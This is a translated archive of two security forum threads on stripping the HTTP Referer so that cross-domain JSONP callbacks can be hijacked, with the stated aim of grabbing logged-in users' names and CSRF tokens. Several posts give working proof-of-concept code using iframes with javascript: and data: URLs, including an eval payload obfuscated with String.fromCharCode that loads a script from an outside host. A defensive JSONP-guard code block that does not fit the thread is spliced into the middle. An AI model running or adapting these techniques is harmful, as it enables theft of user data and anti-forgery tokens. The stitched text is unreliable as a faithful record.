How do you call a remote JS callback without the browser sending a Referer?

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2014-06-17 17:36

As per the title?

When calling a remote JS or callback, the browser by default sends the current page's address (the Referer in the HTTP headers).

How can I make the call while keeping the browser from sending referrer information?

[Original post]

Related discussion:

1#

/fd (madafaka #swag #yolo) | 2014-06-17 17:44

about:blank origin inside an iframe

2#

过客 | 2014-06-17 18:19

This is an old question; it was discussed before. http://zone.wooyun.org/content/744

3#

/fd (madafaka #swag #yolo) | 2014-06-17 19:16

But note that the new RFC for HTTP/1.1 treats about:blank differently

4#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2014-06-18 08:46

@/fd Example please~

5#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2014-06-18 08:47

@过客 Thanks, I'll go take a look.

6#

xsjswt | 2014-06-18 10:05

Cross-domain JS grabbing of a logged-in Baidu user's username and CSRF token

7#

超威蓝猫 (‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮) | 2014-06-18 13:01

@xsjswt Does this.. have any browser limitations?


A working test example:

<body>
</body>
<script language="javascript">

function test(c) {
    alert(c);
}

window.img = "<script>function x(c){parent.test(c);}<\/script><script id='img' src='http://www.baidu.com/?callback=x'><\/script>";

var i = document.createElement("iframe");
i.src = "javascript:parent.img;";
i.id = "frameImg" + Math.random();
//i.scrolling = "no";
//i.setAttribute("frameborder", "0", 0);
//i.style.width = "0px";
//i.style.height = "0px";
//i.style.display = none;
document.body.appendChild(i);

</script>

How to drop the Referer in JSON hijacking

请叫我大神 | 2012-08-08 01:37

<script>
function func(str) {
    alert(str)
}
</script>
<script src="http://www.xxx.com/xxx.cgi?callback=func"></script>

In this kind of attack, suppose http://www.xxx.com/xxx.cgi?callback=func only returns data when the Referer is the xxx.com domain or the Referer is empty. How do you get around that?

What is currently known is to use cross-protocol methods, e.g. https. Is there a better way?

[Original post]

Related discussion:
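The post above describes a JSONP endpoint that releases data when the Referer is the site's own domain or is empty. The following is an added example written from the defending side; it is not code from the thread or from any site mentioned in it. It puts that weak rule beside a stricter guard that treats a missing or unparsable Referer as untrusted, restricts the callback name to a plain identifier, and requires a per-session token. The host name example.com, the request objects, and the token value are all constructed for illustration.

```javascript
// Added example (not from the thread): the weak referer rule described in the
// original post beside a stricter JSONP guard. All inputs are constructed.

// Parse the host out of a Referer header value. Returns null when the header is
// missing, empty, not an absolute URL, or has no hostname (e.g. "about:blank").
function refererHost(referer) {
  if (!referer) return null;
  try {
    const host = new URL(referer).hostname;
    return host || null;
  } catch (e) {
    return null;
  }
}

// True when host is the trusted domain itself or one of its subdomains.
// The leading dot prevents lookalikes such as "notexample.com" from matching.
function isTrustedHost(host, trustedHost) {
  return host === trustedHost || host.endsWith("." + trustedHost);
}

// Weak rule from the original post: release data when the Referer host is the
// site's own domain OR the header is absent. The "absent" branch is the gap the
// thread is about: any document that loads the script without a Referer passes.
function weakAllows(referer, trustedHost) {
  const host = refererHost(referer);
  return host === null || isTrustedHost(host, trustedHost);
}

// Stricter guard: a missing Referer is untrusted, the callback name must be a
// plain identifier (so the response cannot be bent into arbitrary script), and a
// per-session anti-CSRF token must match. The token is what actually binds the
// request to the logged-in user; the Referer check is only a supporting heuristic.
// (A production check would compare the token in constant time.)
function strictAllows(req, trustedHost, expectedToken) {
  const host = refererHost(req.referer);
  const hostOk = host !== null && isTrustedHost(host, trustedHost);
  const callbackOk = /^[A-Za-z_$][\w$]{0,63}$/.test(req.callback || "");
  const tokenOk = typeof req.token === "string" && req.token === expectedToken;
  return hostOk && callbackOk && tokenOk;
}

// Constructed sample requests against a hypothetical endpoint on example.com.
const TRUSTED_HOST = "example.com";
const SESSION_TOKEN = "constructed-session-token";
const SAMPLE_REQUESTS = [
  { label: "same-site page",     referer: "http://www.example.com/home", callback: "cb", token: SESSION_TOKEN },
  { label: "no referer at all",  referer: undefined,                     callback: "cb", token: undefined },
  { label: "unparsable referer", referer: "not-a-url",                   callback: "cb", token: undefined },
  { label: "third-party page",   referer: "http://third-party.test/x",   callback: "cb", token: undefined },
  { label: "lookalike host",     referer: "http://notexample.com/x",     callback: "cb", token: SESSION_TOKEN },
];

// Returns the labels of requests the weak rule would serve but the strict guard
// rejects, i.e. the exposure closed by the stricter check.
function exposureClosedByStrictGuard() {
  return SAMPLE_REQUESTS
    .filter((r) => weakAllows(r.referer, TRUSTED_HOST) && !strictAllows(r, TRUSTED_HOST, SESSION_TOKEN))
    .map((r) => r.label);
}

console.log("served by weak rule, rejected by strict guard:", exposureClosedByStrictGuard());
```

Run with `node` to see the two cases the weak rule lets through: the request with no Referer and the request whose Referer is not a parsable URL. Both are treated as "empty" by the weak rule, which is exactly the condition the thread is trying to produce from a third-party page, and both are rejected by the stricter guard regardless of how the document that issued them was constructed.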

1#

蟋蟀哥哥 (?????????????????????????) | 2012-08-08 01:54

What about constructing the GET or POST yourself in JavaScript?

2#

piao2010 | 2012-08-08 09:41

Ajax won't do it; go a level lower. Reportedly WinHttp can.

3#

piao2010 | 2012-08-08 09:45

Alternatively, bring in another script (any language, as long as it can construct HTTP requests), pass it the relevant parameters, and then the fields in the constructed HTTP request are yours to play with.

4#

xsser (十根阳具有长短!!) | 2012-08-08 10:05

It has to be a method found within the browser layer. There doesn't seem to be a particularly good one. Use Media Player?

5#

Sogili (.) 长短短 (.) | 2012-08-08 10:19

<iframe src="data:text/html,<script src=http://www.baidu.com></script>">

http://jsbin.com/eduyid/

But IE doesn't support it :(

6#

请叫我大神 | 2012-08-08 11:25

@Sogili Yeah, I'm just looking for a universal method.

7#

gainover (">_< ' / & \ 看啥,没见过跨站字符么) | 2012-08-08 12:56

<iframe id="aa" src=""></iframe>
<script>
document.getElementById("aa").src='javascript:"<html><body>wooyun.org<scr'+'ipt>eval(String.fromCharCode(119,105,110,100,111,119,46,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,119,105,110,100,111,119,46,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,50,48,44,49,49,53,44,49,49,53,44,49,49,54,44,52,54,44,49,49,53,44,49,48,53,44,49,49,48,44,57,55,44,57,55,44,49,49,50,44,49,49,50,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,48,44,49,49,49,44,52,54,44,49,48,54,44,49,49,53,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,119,105,110,100,111,119,46,115,41))</scr'+'ipt></body></html>"';
</script>

8#

gainover (">_< ' / & \ 看啥,没见过跨站字符么) | 2012-08-08 12:56

= = The code above doesn't seem to have displayed completely...

<iframe id="aa" src=""></iframe>
<script>
document.getElementById("aa").src='javascript:"<html><body>wooyun.org<scr'+'ipt>eval(String.fromCharCode(119,105,110,100,111,119,46,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,119,105,110,100,111,119,46,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,50,48,44,49,49,53,44,49,49,53,44,49,49,54,44,52,54,44,49,49,53,44,49,48,53,44,49,49,48,44,57,55,44,57,55,44,49,49,50,44,49,49,50,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,48,44,49,49,49,44,52,54,44,49,48,54,44,49,49,53,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,119,105,110,100,111,119,46,115,41))</scr'+'ipt></body></html>"';
</script>

9#

_Evil (尘俗当中有太多人 相识过爱不到) | 2012-08-08 12:56

Just watching and learning.

10#

gainover (">_< ' / & \ 看啥,没见过跨站字符么) | 2012-08-08 12:58

The principle is to use xxx.src='javascript:"HTML code"'; which drops the referer.

11#

_Evil (尘俗当中有太多人 相识过爱不到) | 2012-08-08 12:59

@gainover You've surpassed the gods... Such an easy bypass 0.0 Brilliant

12#

p.z (一回头 青春都喂了狗) | 2012-08-08 13:14

@gainover +1

13#

lanz | 2012-08-08 14:29

@gainover In IE there's still a Referer though

14#

xsjswt | 2012-08-08 14:31

@xsser No code, no truth. Begging for the Media Player one.

15#

Zvall (safeKey team - 电击小子) | 2012-08-08 14:34

Spectating!!!!!!!

16#

Sogili (.) 长短短 (.) | 2012-08-08 14:37

@lanz

<iframe src="javascript:'<script src=http://www.baidu.com></script>'"></iframe>

What about this?

17#

xsser (十根阳具有长短!!) | 2012-08-08 14:38

@gainover I want to send you WooYun coins!

18#

gainover (">_< ' / & \ 看啥,没见过跨站字符么) | 2012-08-08 15:05

@lanz My capture here shows no referer.....

19#

Sogili (.) 长短短 (.) | 2012-08-08 15:07

@gainover I have one here too, but with the code I left above there's none :(

20#

gainover (">_< ' / & \ 看啥,没见过跨站字符么) | 2012-08-08 15:21

@lanz @Sogili Which IE version? I tested on IE8 and there was no referer...

21#

insight-labs (Root Yourself in Success) | 2012-08-08 15:23

@请叫我大神 ftp works well; Firefox doesn't support it. Combine it with @Sogili's method and add a check, and that's about it!

22#

Sogili (.) 长短短 (.) | 2012-08-08 15:26

@gainover IE8

23#

rayh4c | 2012-08-08 15:34

Requests initiated from an about:blank page have no referer

24#

gainover (">_< ' / & \ 看啥,没见过跨站字符么) | 2012-08-08 15:35

@Sogili = = That's strange. Could some patch have fixed it?

25#

请叫我大神 | 2012-08-08 16:01

@rayh4c show me the code,wtf

26#

also (我姓王名大锤,我万万没有想到我成了乌云修电脑的。) | 2012-08-08 16:17

@gainover Bowing to the master

27#

rayh4c | 2012-08-08 16:38

@请叫我大神 When src is empty, they are all about:blank pages, i.e. blank pages. A request initiated from inside a blank page naturally has no referer. That's the key.

28#

Sogili (.) 长短短 (.) | 2012-08-08 16:58

@rayh4c = = If you write() into it, there will be a referer

29#

rayh4c | 2012-08-08 17:18

@Sogili write has one because the DOM object is associated with the about:blank page's parent window. Try these methods with a non-about:blank page; there should be a referer.

30#

Sogili (.) 长短短 (.) | 2012-08-08 17:20

<iframe src="" id=x></iframe>
<script defer>
x.document.body.innerHTML='-<script defer src=http://www.baidu.com><\/script>';
</script>

31#

rayh4c | 2012-08-08 17:30

@Sogili - -!! What I mean is, find a normal site and inject the code below via the pseudo-protocol; there will definitely be a referer

javascript:'<script src=http://www.baidu.com><\/script>'

If your code is on a non-about:blank page there will definitely be a referer; calling it through the DOM creates a parent-child window relationship.

32#

Sogili (.) 长短短 (.) | 2012-08-08 17:34

@rayh4c My test here shows none :)

33#

Sogili (.) 长短短 (.) | 2012-08-08 17:37

@rayh4c write has one, innerHTML doesn't :(

34#

rayh4c | 2012-08-08 17:53

@Sogili Indeed there isn't. X, populated dynamically, is still about:blank, while Y after write is no longer about:blank.

<iframe src="" id=x></iframe>
<script defer>
x.document.body.innerHTML='-<script defer>alert(\'x:\'+window.parent.x.location)<\/script>';
</script>

<iframe src="" id=y></iframe>
<script defer>
y.document.write('-<script defer>alert(\'y:\'+window.parent.y.location)<\/script>');
</script>

35#

Sogili (.) 长短短 (.) | 2012-08-08 18:08

@rayh4c Yes, indeed

36#

gainover (">_< ' / & \ 看啥,没见过跨站字符么) | 2012-08-08 22:59

@Sogili After getting back to the dorm I tested again; written this way there is no referer. Looks like you can't use JS to dynamically call it a second time here, only a direct <script> insertion.

37#

lanz | 2012-08-10 10:15

@Sogili @gainover Once you've got IE happy, FF refuses to cooperate. Can't have it both ways; it's simpler to just use https.

38#

啤酒 (xx) | 2012-08-10 23:41

What if you want to get the returned data?

39#

啤酒 (xx) | 2012-08-10 23:51

@Zvall http://zone.wooyun.org/upload/avatar/avatar_686_b.jpg Was the avatar grabbed this way, I guess?

Comments (old system):

Anonymous @ 2014-06-19 16:32:21

核总 has been updating less lately. I'm not doing tech anymore; from now on I'm starting down the path of bullshitting, and I'm posting this as proof. And to show off to you again: 核总, I've got a girlfriend now :)

Site reply:

A bit busy lately, so there's been less time for updates. By the way, is your girlfriend your left hand or your right hand, or is she inflatable?